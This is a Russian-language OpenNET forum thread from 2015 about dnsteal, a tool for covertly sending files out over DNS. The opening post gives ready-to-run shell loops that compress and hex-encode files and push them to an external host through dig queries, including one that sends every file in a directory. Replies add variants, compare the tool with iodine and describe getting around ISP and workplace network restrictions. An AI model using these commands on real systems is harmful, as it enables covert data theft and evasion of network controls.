The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  вход/выход  слежка  RSS
"Раздел полезных советов: Скрытая отправка файлов через DNS"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Раздел полезных советов: Скрытая отправка файлов через DNS"  +/
Сообщение от auto_tips on 10-Окт-15, 23:12 
В рамках проекта https://github.com/m57/dnsteal развивается фиктивный DNS-сервер, позволяющий организовать скрытую отправку файлов по протоколу DNS, используя штатные системные утилиты резолвинга. Для уменьшения трафика поддерживается сжатие передаваемого содержимого.


Запускаем сервер ("-z" - включает сжатие):

   python dnsteal.py 192.168.1.1 -z


Для отправки файла send.txt на внешний хост 192.168.1.1, на котором запущен dnsteal, достаточно выполнить:

   for b in $(gzip -c send.txt | xxd -p); do dig @192.168.1.1 $b.filename.com; done

Для отправки всех файлов из текущей директории

   for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @192.168.1.1 %b.$filename.com; done; done


URL:
Обсуждается: http://www.opennet.dev/tips/info/2922.shtml

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по ответам | RSS]

1. "Скрытая отправка файлов через DNS"  +/
Сообщение от a9a83j43nja09gje on 10-Окт-15, 23:12 
текущая версия на гитхабе не заработала) заработал форк там же на гитхабе, файл 1 мб отправлялся больше 6 часов, так и не отправился) надо было идти домой
идея не нова, но интересно и доступно!)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Скрытая отправка файлов через DNS"  +/
Сообщение от fleonis (ok) on 11-Окт-15, 12:58 
в смысле отправить файл, замаскировав его под обычный dns запрос?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Скрытая отправка файлов через DNS"  +/
Сообщение от Nas_tradamus (ok) on 11-Окт-15, 15:37 
Но есть же iodine для более коварных вещей.
Тестил - работает. Эта штука позволяет заворачивать весь ipv4-трафиик через DNS.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Скрытая отправка файлов через DNS"  +/
Сообщение от Аноним (??) on 11-Окт-15, 20:49 
> Но есть же iodine для более коварных вещей.

Вся прелесть предложенного решения в том, что на клиенте достаточно обычного shell и любой штатной утилиты типа dig для резолвинга. В  iodine  нужно ставить специального клиента, что сводит на нет всю "скрытность" действий на клиентской системе.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Скрытая отправка файлов через DNS"  +/
Сообщение от Crazy Alex (ok) on 12-Окт-15, 21:03 
Добавили бы fold чтобы не по одному байту посылать, а по 10, например:

for b in $(gzip -c send.txt | xxd -p |fold -b10); do dig @192.168.1.1 $b.filename.com; done

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Скрытая отправка файлов через DNS"  +/
Сообщение от Аноним (??) on 14-Окт-15, 13:10 
Это у вас такой странных xxd. Опция -p как раз и нужна для того, чтобы не разделять байты. Разделение происходит на длинные строки.
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "Скрытая отправка файлов через DNS"  +/
Сообщение от Виталий (??) on 15-Окт-15, 12:33 
dig @192.168.1.1
так если у вас открыт порт на удаленном сервере - можно все что угодно. вот если бы  dig @днспровайдера\конторы\которая не выпускает ничего больше как через Собственных днс сервре ....
в общем костыль к квадратному колесу
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Скрытая отправка файлов через DNS"  +/
Сообщение от Alex (??) on 15-Окт-15, 22:28 
Элементарно, ватсон. Чуть переписываете шеловую команду (префиксуете байты, чтобы от кеширования уйти), и она с удовольствием шлёт резолвы через любую цепочку резолверов к вашему домену.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

9. "Скрытая отправка файлов через DNS"  +/
Сообщение от YetAnotherOnanym (ok) on 16-Окт-15, 15:23 
А зачем писать отдельный демон, когда можно просто прогрепать логи бинда (или кто там крутится) и вытащить фрагменты из сообщений об ошибках? А ещё вопрос - если у провайдера несколько роутов к целевому хосту и запросы прибудут не в том порядке, в каком они были отправлены - с этим что делать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Скрытая отправка файлов через DNS"  +/
Сообщение от Аннонним on 17-Окт-15, 05:58 
Подумал халявный интернет изобрели, оказалось нет - 6 часов, пусть даже на файл 1 мб, это слишком долго.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Скрытая отправка файлов через DNS"  +/
Сообщение от pavlinux (ok) on 18-Окт-15, 01:52 
У нормального провайдера, с неоплаченным инетом, запросы дальше фаервола не ходят.  
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

12. "Скрытая отправка файлов через DNS"  +/
Сообщение от count0krsk (ok) on 18-Окт-15, 06:29 
Так и есть. Даже днс-запросы режут, не говоря о пингах. Причем ВСЕ провайдеры, с которыми сталкивался. Исключение - пиринговые ресурсы. Они работают свободно. А т.к. в городском пиринге почти все провайдеры, просто поднимается прокся у другого прова, и через неё работаете, если лень платить идти. Ещё можно так с работы сидеть в необрезанном инете, если вы - кодер, а злой админ закрыл вконтактик.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

13. "Скрытая отправка файлов через DNS"  +/
Сообщение от Анонимус III on 18-Окт-15, 11:05 
У моего провайдера с неоплаченным интернетом работал сайт провайдера. А на сайте провайдера была бесплатная почта, ящик 10 МБ. И через POP3/IMAP/SMTP она тоже была доступна. Запустил на работе демона, который по почте получал URL, скачивал его, разбивал на куски размером 10 МБ и отсылал на тот бесплатный ящик. А дома другой демон доставал куски из ящика и собирал воедино. Недели три так сидел, из спортивного интереса.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

14. "Скрытая отправка файлов через DNS"  +/
Сообщение от Мимо проходил on 20-Окт-15, 09:45 
А можно поподробней про реализацию?
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

15. "Скрытая отправка файлов через DNS"  +/
Сообщение от Аноним (??) on 22-Окт-15, 12:17 
прям как Столман
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

16. "Скрытая отправка файлов через DNS"  +/
Сообщение от pavlinux (ok) on 23-Окт-15, 01:27 
> А можно поподробней про реализацию?

До макдональца быстрее добежать.

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

17. "Скрытая отправка файлов через DNS"  +/
Сообщение от НьюВасюковец on 26-Окт-15, 13:24 
Без примера -это просто трепология.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

18. "Скрытая отправка файлов через DNS"  +/
Сообщение от НьюВасюковец on 26-Окт-15, 13:28 
> А можно поподробней про реализацию?

таких примеров жопой жуй
http://habrahabr.ru/post/65322/

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

19. "Скрытая отправка файлов через DNS"  +/
Сообщение от анонимаус on 27-Окт-15, 10:56 
администраторам localnet чтоли?

вся прелесть iodine в том, что он работает и за firewall (и wifi, не авторизовавшись, но те которые резолвят внешние имена), кто же вас пустит на внешний сервер напрямую (dig @server) из сети, которая за firewall ?

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

20. "Скрытая отправка файлов через DNS"  +/
Сообщение от Аноним (??) on 20-Ноя-15, 22:04 
Если вы кодер, а злой админ закрыл вконтактик, то что вам мешает пробросить ssh-tunnel?
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

21. "Скрытая отправка файлов через DNS"  +/
Сообщение от DmA (??) on 22-Ноя-15, 10:25 
лучше бы придумали как DNS пакеты нельзя было ни подменить, ни посмотреть что там внутри ходит...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

22. "Скрытая отправка файлов через DNS"  +/
Сообщение от Pahanivo (ok) on 24-Ноя-15, 15:11 
вот именно, что вся эта бредовая идея идет в опу, если админ держить днс на шлюзе и фильтрует внешние, а он скорей всего так и делает.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

23. "Скрытая отправка файлов через DNS"  +/
Сообщение от nuclight (??) on 27-Ноя-15, 14:29 
dnscrypt от djb сто лет как
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

24. "Скрытая отправка файлов через DNS"  +/
Сообщение от AdVv (ok) on 30-Июн-16, 15:43 
Наводящий вопрос: откуда "днс на шлюзе местного админа" берет информацию о неизвестных доменных адресах ?
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

25. "Скрытая отправка файлов через DNS"  +/
Сообщение от freehck email(ok) on 03-Ноя-16, 15:50 
Имхо легче туннель через 443й порт повесить, используя, скажем, sslh. 443й обычно открыт, а что ты там внутри туннеля шлёшь никто всё равно не прочитает. А 53й с весьма большой вероятностью может быть и закрыт.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру